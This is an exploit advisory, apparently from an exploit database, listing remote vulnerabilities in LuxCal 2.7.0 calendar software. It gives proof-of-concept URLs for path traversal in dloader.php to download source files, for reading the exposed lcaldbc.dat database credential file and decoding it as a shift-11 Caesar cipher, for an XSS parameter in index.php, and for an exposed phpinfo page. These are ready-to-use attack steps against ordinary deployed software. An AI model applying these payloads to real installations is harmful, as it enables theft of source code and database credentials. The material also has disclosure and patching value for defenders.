################################################# ### Exploit Title: LuxCal v2.7.0 Multiple Remote Vulnerabilities ### Date: 17/09/2012 ### Author: L0n3ly-H34rT ### Contact: l0n3ly_h34rt@hotmail.com ### My Site: http://se3c.blogspot.com/ ### Vendor Link: http://www.luxsoft.eu/ ### Software Link: http://www.luxsoft.eu/dloader.php?file=luxcal270.zip ### Version: 2.7.0 ### Tested on: Linux/Windows ################################################# 1- Local File Inclusion : * P.O.C : http://127.0.0.1/luxcal270/dloader.php?fName=../index.php this is example for download the source of index script , you will see the source inside as name of affected file "dloader.php" 2- Information Disclosure : * P.O.C : http://127.0.0.1/luxcal270/lcaldbc.dat - you will see the information of database but encrypte as Caesar cipher methode in shift 11 e.g. : LuxCal 2.7.0 p 5 {x 0;h 9 "adrpawdhi";x 1;h 4 "ajmm";x 2;h 4 "gddi";x 3;h 6 "000000";x 4;h 0 "";} - my information in database is : mysql server : localhost mysql username : root mysql password : 000000 mysql database : luxx - when i install script all this name of information is encrypte and the word become as we see before in file "lcaldbc.dat" : mysql server : adrpawdhi mysql username : gddi mysql password : 000000 mysql database : ajmm - you ask me how to decrypt that , you can decrypt by many ways but i give the easy way here : http://www.richkXXXXi.co.uk/php/crypta/caesar.php you can put your text and submit to decipher that word , then search in " Processed text - shift 11 " you will see your decrypted word .. 3- XSS : * P.O.C : http://127.0.0.1/luxcal270/index.php?cD=[XSS] also some files is affected 4- phpinfo () : http://127.0.0.1/luxcal270/pages/phpinfo.php ############################################ # Greetz to my friendz